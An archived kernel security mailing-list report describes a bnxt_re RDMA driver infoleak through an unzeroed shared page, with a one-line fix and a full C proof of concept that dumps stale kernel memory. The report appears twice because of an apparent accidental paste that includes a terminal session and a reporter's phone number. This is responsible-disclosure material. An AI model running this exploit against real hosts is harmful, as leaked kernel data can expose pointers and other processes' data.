Linux RDMA and InfiniBand development
 help / color / mirror / Atom feed
* [security] RDMA/bnxt_re: kernel infoleak via uninitialised shpg shared page exposed to userspace
@ 2026-05-08 13:45 Henrik Holmberg
  2026-05-08 13:51 ` Greg KH
  0 siblings, 1 reply; 6+ messages in thread
From: Henrik Holmberg @ 2026-05-08 13:45 UTC (permalink / raw)
  To: security; +Cc: selvin.xavier, kalesh-anakkur.purayil, linux-rdma

Hi,

I am reporting an information disclosure in the bnxt_re RDMA driver.
The shared page handed to userspace via BNXT_RE_MMAP_SH_PAGE is
allocated with __get_free_page(GFP_KERNEL) and never zeroed, leaking
up to 4092 bytes of stale kernel data per per-process ucontext.

Affected kernel versions
------------------------
Confirmed present in:
  - 6.6.81 LTS    drivers/infiniband/hw/bnxt_re/ib_verbs.c:4158
  - 6.12.42 LTS   drivers/infiniband/hw/bnxt_re/ib_verbs.c:4241
  - 7.0.5 stable  drivers/infiniband/hw/bnxt_re/ib_verbs.c:4378
  - mainline as of 2026-05-08 (per torvalds/master tip)

No memset(uctx->shpg, 0, PAGE_SIZE) exists in any of these trees.

Problem description
-------------------
bnxt_re_alloc_ucontext() in drivers/infiniband/hw/bnxt_re/ib_verbs.c
allocates the per-context shared page:

    uctx->shpg = (void *)__get_free_page(GFP_KERNEL);

The page is then registered for mmap exposure via:

    entry = bnxt_re_mmap_entry_insert(uctx, 0, BNXT_RE_MMAP_SH_PAGE, NULL);

And mapped into userspace by bnxt_re_mmap():

    case BNXT_RE_MMAP_SH_PAGE:
        ret = vm_insert_page(vma, vma->vm_start, virt_to_page(uctx->shpg));
        break;

The only kernel write into this page is a single u32 store of the AVID
at offset BNXT_RE_AVID_OFFT (0x10) inside bnxt_re_create_ah():

    wrptr = (u32 *)(uctx->shpg + BNXT_RE_AVID_OFFT);
    *wrptr = ah->qplib_ah.id;

Since __get_free_page(GFP_KERNEL) returns a buddy page that is not
zeroed, the remaining 4092 bytes of the page contain stale kernel data
when the userspace process maps it. Any user with access to the
relevant /dev/infiniband/uverbsX node and a bnxt_re device can read
this data via a single mmap() call after IB_USER_VERBS_CMD_GET_CONTEXT.

The leaked content depends on the freed kernel object that previously
occupied the page. In practice it can include kernel pointers
(KASLR bypass), slab objects, fragments of recently freed user-process
pages, network skbs, and DMA ring data.

Why this is unintentional, not by design
----------------------------------------
1. The same file already uses get_zeroed_page() for the analogous
   per-SRQ and per-CQ user-mapped shared pages:

       drivers/infiniband/hw/bnxt_re/ib_verbs.c:1956
           srq->uctx_srq_page = (void *)get_zeroed_page(GFP_KERNEL);
       drivers/infiniband/hw/bnxt_re/ib_verbs.c:3229
           cq->uctx_cq_page  = (void *)get_zeroed_page(GFP_KERNEL);

   shpg is the only outlier.

2. Other RDMA drivers consistently zero pages they expose:

       drivers/infiniband/hw/qedr/verbs.c:758    get_zeroed_page(GFP_USER)
       drivers/infiniband/hw/mlx4/mr.c:306       get_zeroed_page(GFP_KERNEL)
       drivers/infiniband/hw/mthca/mthca_allocator.c:129
                                                 get_zeroed_page(GFP_ATOMIC)
       drivers/infiniband/hw/efa/efa_verbs.c:190 alloc_pages_exact(...
__GFP_ZERO)
       drivers/infiniband/hw/mlx5/umr.c:509      gfp_mask |= __GFP_ZERO

3. The driver only ever writes 4 bytes of the 4096-byte page; the
   remaining bytes have no driver-defined contents and should be zero
   if the convention is respected.

Reproducer
----------
A standalone C reproducer (no libibverbs dependency, only kernel uapi
inline-copied) is included below. It opens /dev/infiniband/uverbsX,
creates a ucontext with IB_USER_VERBS_CMD_GET_CONTEXT, mmap()'s pgoff=0
(BNXT_RE_MMAP_SH_PAGE), and dumps the resulting page.

Build:
    gcc -O2 -Wall -Wextra -o 041_poc 041_bnxt_re_shpg_leak.c

Run on a host with bnxt_re hardware:
    ./041_poc

Source (paste into 041_bnxt_re_shpg_leak.c):

----- 8< ----- 8< ----- 8< -----
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>

enum { IB_USER_VERBS_CMD_GET_CONTEXT = 1 };

struct ib_uverbs_cmd_hdr {
    uint32_t command;
    uint16_t in_words;
    uint16_t out_words;
};

struct ib_uverbs_get_context {
    uint64_t response;
    uint64_t driver_data[0];
};

#define BNXT_RE_RESP_BYTES   1024
#define PAGE_SIZE_LOCAL      4096

static int find_uverbs(char *out, size_t out_len)
{
    DIR *d = opendir("/dev/infiniband");
    if (!d) { perror("opendir"); return -1; }
    struct dirent *de;
    while ((de = readdir(d))) {
        if (strncmp(de->d_name, "uverbs", 6) == 0) {
            snprintf(out, out_len, "/dev/infiniband/%s", de->d_name);
            closedir(d);
            return 0;
        }
    }
    closedir(d);
    return -1;
}

static int alloc_ucontext(int fd)
{
    struct {
        struct ib_uverbs_cmd_hdr hdr;
        struct ib_uverbs_get_context cmd;
        uint64_t bnxt_re_req[1];
    } req;
    static uint8_t resp_buf[BNXT_RE_RESP_BYTES] __attribute__((aligned(8)));

    memset(&req, 0, sizeof(req));
    memset(resp_buf, 0, sizeof(resp_buf));

    req.hdr.command   = IB_USER_VERBS_CMD_GET_CONTEXT;
    req.hdr.in_words  = (sizeof(req) - sizeof(req.hdr)) / 4;
    req.hdr.out_words = BNXT_RE_RESP_BYTES / 4;
    req.cmd.response  = (uintptr_t)resp_buf;

    if (write(fd, &req, sizeof(req)) < 0) {
        perror("write get_context");
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[256];
    if (find_uverbs(path, sizeof(path)) < 0) return 1;

    int fd = open(path, O_RDWR);
    if (fd < 0) { perror("open"); return 1; }
    if (alloc_ucontext(fd) < 0) { close(fd); return 1; }

    void *p = mmap(NULL, PAGE_SIZE_LOCAL, PROT_READ, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) { perror("mmap"); close(fd); return 1; }

    const uint8_t *b = p;
    int nonzero = 0;
    for (int i = 0; i < PAGE_SIZE_LOCAL; i++) {
        if (i >= 0x10 && i <= 0x13) continue;
        if (b[i]) nonzero++;
    }
    printf("non-zero bytes outside AVID field: %d / %d\n",
           nonzero, PAGE_SIZE_LOCAL - 4);

    for (int i = 0; i < PAGE_SIZE_LOCAL; i += 16) {
        printf("%04x  ", i);
        for (int j = 0; j < 16; j++) printf("%02x ", b[i+j]);
        printf("\n");
    }

    munmap(p, PAGE_SIZE_LOCAL);
    close(fd);
    return 0;
}
----- >8 ----- >8 ----- >8 -----

Conditions
----------
- Hardware: Broadcom NetXtreme-E NIC with bnxt_re module loaded
  (BCM5750x family).
- Permissions: read/write access to /dev/infiniband/uverbsX. On most
  distributions this requires membership in the rdma group, but some
  configurations expose the node more broadly via udev rules.
- No CAP_SYS_ADMIN, CAP_NET_ADMIN, or CAP_NET_RAW required.

Suggested fix (one-line)
------------------------
diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
@@ -4375,7 +4375,7 @@ int bnxt_re_alloc_ucontext(struct ib_ucontext
*ctx, struct ib_udata *udata)

        uctx->rdev = rdev;

-       uctx->shpg = (void *)__get_free_page(GFP_KERNEL);
+       uctx->shpg = (void *)get_zeroed_page(GFP_KERNEL);
        if (!uctx->shpg) {
                rc = -ENOMEM;
                goto fail;

Performance impact: one page-zeroing per ucontext allocation, i.e. once
per RDMA application connection. Negligible.

Disclosure
----------
I have not shared this report outside this email. I am willing to
follow the standard Linux kernel security disclosure timeline (up to
14 days). Please let me know once you have confirmed the issue, and
whether you want me to handle the CVE request via cve@kernel.org or
whether the security team will route it.

Best regards,
<your name>
15:29 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/disclosure
❯ cd ..
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ ls
disclosure  findings  poc  sources
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ cd poc/
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ ls
041_bnxt_re_shpg_leak.c  041_poc
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ ./041_poc
[!] /dev/infiniband saknas — RDMA-stack ej laddad?
✘1 15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ id
uid=1000(l0rds474n) gid=1001(l0rds474n)
grupper=1001(l0rds474n),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),106(netdev),120(bluetooth),126(lpadmin),129(scanner),1000(docker)
15:31 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ cd ..
15:40 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ cd disclosure/
15:40 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/disclosure
❯ cat email-template.txt
To: security@kernel.org
Cc: selvin.xavier@broadcom.com, kalesh-anakkur.purayil@broadcom.com,
linux-rdma@vger.kernel.org
Subject: [security] RDMA/bnxt_re: kernel infoleak via uninitialised
shpg shared page exposed to userspace

Hi,

I am a Senior IT Security Researcher at Defensify (https://defensify.se),
reporting an information disclosure vulnerability in the bnxt_re RDMA
driver. The shared page handed to userspace via BNXT_RE_MMAP_SH_PAGE is
allocated with __get_free_page(GFP_KERNEL) and never zeroed, leaking
up to 4092 bytes of stale kernel data per per-process ucontext.

Affected kernel versions
------------------------
Confirmed present in:
  - 6.6.81 LTS    drivers/infiniband/hw/bnxt_re/ib_verbs.c:4158
  - 6.12.42 LTS   drivers/infiniband/hw/bnxt_re/ib_verbs.c:4241
  - 7.0.5 stable  drivers/infiniband/hw/bnxt_re/ib_verbs.c:4378
  - mainline as of 2026-05-08 (per torvalds/master tip)

No memset(uctx->shpg, 0, PAGE_SIZE) exists in any of these trees.

Problem description
-------------------
bnxt_re_alloc_ucontext() in drivers/infiniband/hw/bnxt_re/ib_verbs.c
allocates the per-context shared page:

    uctx->shpg = (void *)__get_free_page(GFP_KERNEL);

The page is then registered for mmap exposure via:

    entry = bnxt_re_mmap_entry_insert(uctx, 0, BNXT_RE_MMAP_SH_PAGE, NULL);

And mapped into userspace by bnxt_re_mmap():

    case BNXT_RE_MMAP_SH_PAGE:
        ret = vm_insert_page(vma, vma->vm_start, virt_to_page(uctx->shpg));
        break;

The only kernel write into this page is a single u32 store of the AVID
at offset BNXT_RE_AVID_OFFT (0x10) inside bnxt_re_create_ah():

    wrptr = (u32 *)(uctx->shpg + BNXT_RE_AVID_OFFT);
    *wrptr = ah->qplib_ah.id;

Since __get_free_page(GFP_KERNEL) returns a buddy page that is not
zeroed, the remaining 4092 bytes of the page contain stale kernel data
when the userspace process maps it. Any user with access to the
relevant /dev/infiniband/uverbsX node and a bnxt_re device can read
this data via a single mmap() call after IB_USER_VERBS_CMD_GET_CONTEXT.

The leaked content depends on the freed kernel object that previously
occupied the page. In practice it can include kernel pointers
(KASLR bypass), slab objects, fragments of recently freed user-process
pages, network skbs, and DMA ring data.

Why this is unintentional, not by design
----------------------------------------
1. The same file already uses get_zeroed_page() for the analogous
   per-SRQ and per-CQ user-mapped shared pages:

       drivers/infiniband/hw/bnxt_re/ib_verbs.c:1956
           srq->uctx_srq_page = (void *)get_zeroed_page(GFP_KERNEL);
       drivers/infiniband/hw/bnxt_re/ib_verbs.c:3229
           cq->uctx_cq_page  = (void *)get_zeroed_page(GFP_KERNEL);

   shpg is the only outlier.

2. Other RDMA drivers consistently zero pages they expose:

       drivers/infiniband/hw/qedr/verbs.c:758    get_zeroed_page(GFP_USER)
       drivers/infiniband/hw/mlx4/mr.c:306       get_zeroed_page(GFP_KERNEL)
       drivers/infiniband/hw/mthca/mthca_allocator.c:129
                                                 get_zeroed_page(GFP_ATOMIC)
       drivers/infiniband/hw/efa/efa_verbs.c:190 alloc_pages_exact(...
__GFP_ZERO)
       drivers/infiniband/hw/mlx5/umr.c:509      gfp_mask |= __GFP_ZERO

3. The driver only ever writes 4 bytes of the 4096-byte page; the
   remaining bytes have no driver-defined contents and should be zero
   if the convention is respected.

Reproducer
----------
A standalone C reproducer (no libibverbs dependency, only kernel uapi
inline-copied) is included below. It opens /dev/infiniband/uverbsX,
creates a ucontext with IB_USER_VERBS_CMD_GET_CONTEXT, mmap()'s pgoff=0
(BNXT_RE_MMAP_SH_PAGE), and dumps the resulting page.

Build:
    gcc -O2 -Wall -Wextra -o 041_poc 041_bnxt_re_shpg_leak.c

Run on a host with bnxt_re hardware:
    ./041_poc

Source (paste into 041_bnxt_re_shpg_leak.c):

----- 8< ----- 8< ----- 8< -----
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>

enum { IB_USER_VERBS_CMD_GET_CONTEXT = 1 };

struct ib_uverbs_cmd_hdr {
    uint32_t command;
    uint16_t in_words;
    uint16_t out_words;
};

struct ib_uverbs_get_context {
    uint64_t response;
    uint64_t driver_data[0];
};

#define BNXT_RE_RESP_BYTES   1024
#define PAGE_SIZE_LOCAL      4096

static int find_uverbs(char *out, size_t out_len)
{
    DIR *d = opendir("/dev/infiniband");
    if (!d) { perror("opendir"); return -1; }
    struct dirent *de;
    while ((de = readdir(d))) {
        if (strncmp(de->d_name, "uverbs", 6) == 0) {
            snprintf(out, out_len, "/dev/infiniband/%s", de->d_name);
            closedir(d);
            return 0;
        }
    }
    closedir(d);
    return -1;
}

static int alloc_ucontext(int fd)
{
    struct {
        struct ib_uverbs_cmd_hdr hdr;
        struct ib_uverbs_get_context cmd;
        uint64_t bnxt_re_req[1];
    } req;
    static uint8_t resp_buf[BNXT_RE_RESP_BYTES] __attribute__((aligned(8)));

    memset(&req, 0, sizeof(req));
    memset(resp_buf, 0, sizeof(resp_buf));

    req.hdr.command   = IB_USER_VERBS_CMD_GET_CONTEXT;
    req.hdr.in_words  = (sizeof(req) - sizeof(req.hdr)) / 4;
    req.hdr.out_words = BNXT_RE_RESP_BYTES / 4;
    req.cmd.response  = (uintptr_t)resp_buf;

    if (write(fd, &req, sizeof(req)) < 0) {
        perror("write get_context");
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[256];
    if (find_uverbs(path, sizeof(path)) < 0) return 1;

    int fd = open(path, O_RDWR);
    if (fd < 0) { perror("open"); return 1; }
    if (alloc_ucontext(fd) < 0) { close(fd); return 1; }

    void *p = mmap(NULL, PAGE_SIZE_LOCAL, PROT_READ, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) { perror("mmap"); close(fd); return 1; }

    const uint8_t *b = p;
    int nonzero = 0;
    for (int i = 0; i < PAGE_SIZE_LOCAL; i++) {
        if (i >= 0x10 && i <= 0x13) continue;
        if (b[i]) nonzero++;
    }
    printf("non-zero bytes outside AVID field: %d / %d\n",
           nonzero, PAGE_SIZE_LOCAL - 4);

    for (int i = 0; i < PAGE_SIZE_LOCAL; i += 16) {
        printf("%04x  ", i);
        for (int j = 0; j < 16; j++) printf("%02x ", b[i+j]);
        printf("\n");
    }

    munmap(p, PAGE_SIZE_LOCAL);
    close(fd);
    return 0;
}
----- >8 ----- >8 ----- >8 -----

Conditions
----------
- Hardware: Broadcom NetXtreme-E NIC with bnxt_re module loaded
  (BCM5750x family).
- Permissions: read/write access to /dev/infiniband/uverbsX. On most
  distributions this requires membership in the rdma group, but some
  configurations expose the node more broadly via udev rules.
- No CAP_SYS_ADMIN, CAP_NET_ADMIN, or CAP_NET_RAW required.

Suggested fix (one-line)
------------------------
diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
@@ -4375,7 +4375,7 @@ int bnxt_re_alloc_ucontext(struct ib_ucontext
*ctx, struct ib_udata *udata)

        uctx->rdev = rdev;

-       uctx->shpg = (void *)__get_free_page(GFP_KERNEL);
+       uctx->shpg = (void *)get_zeroed_page(GFP_KERNEL);
        if (!uctx->shpg) {
                rc = -ENOMEM;
                goto fail;

Performance impact: one page-zeroing per ucontext allocation, i.e. once
per RDMA application connection. Negligible.

Disclosure and credit
---------------------
This issue was discovered during independent vulnerability research at
Defensify (https://defensify.se), a Swedish IT security firm focused on
offensive and defensive kernel-level research.

I have not shared this report outside this email. I am willing to
follow the standard Linux kernel security disclosure timeline (up to
14 days). Please let me know once you have confirmed the issue, and
whether you want me to handle the CVE request via cve@kernel.org or
whether the security team will route it.

For the CVE record, mailing-list announcements, fix commit message
("Reported-by:") and any kernel.org acknowledgements, please attribute
the discovery as follows:

    Reported-by: Lord Ulf Henrik Holmberg
<henrik.holmberg@defensify.se> (Defensify)

If your tooling does not accept the parenthetical affiliation, the bare
form

    Reported-by: Lord Ulf Henrik Holmberg <henrik.holmberg@defensify.se>

is acceptable; the @defensify.se address itself attributes the work to
the company. Please CC me on the resulting commit and any CVE record so
we can mirror it on our advisory page.

Best regards,

Lord Ulf Henrik Holmberg
Senior IT Security Researcher
Defensify
https://defensify.se
henrik.holmberg@defensify.se
GitHub: https://github.com/L0rdS474n
+46 73 599 52 38
PGP: https://keybase.io/d313373_m3/pgp_keys.asc

^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2026-05-09  8:42 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-08 13:45 [security] RDMA/bnxt_re: kernel infoleak via uninitialised shpg shared page exposed to userspace Henrik Holmberg
2026-05-08 13:51 ` Greg KH
2026-05-08 14:23   ` Henrik Holmberg
2026-05-08 20:24   ` Henrik Holmberg
2026-05-09  4:25     ` Greg KH
2026-05-09  8:40       ` [PATCH] RDMA/bnxt_re: zero shared page before exposing " pomzm67

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox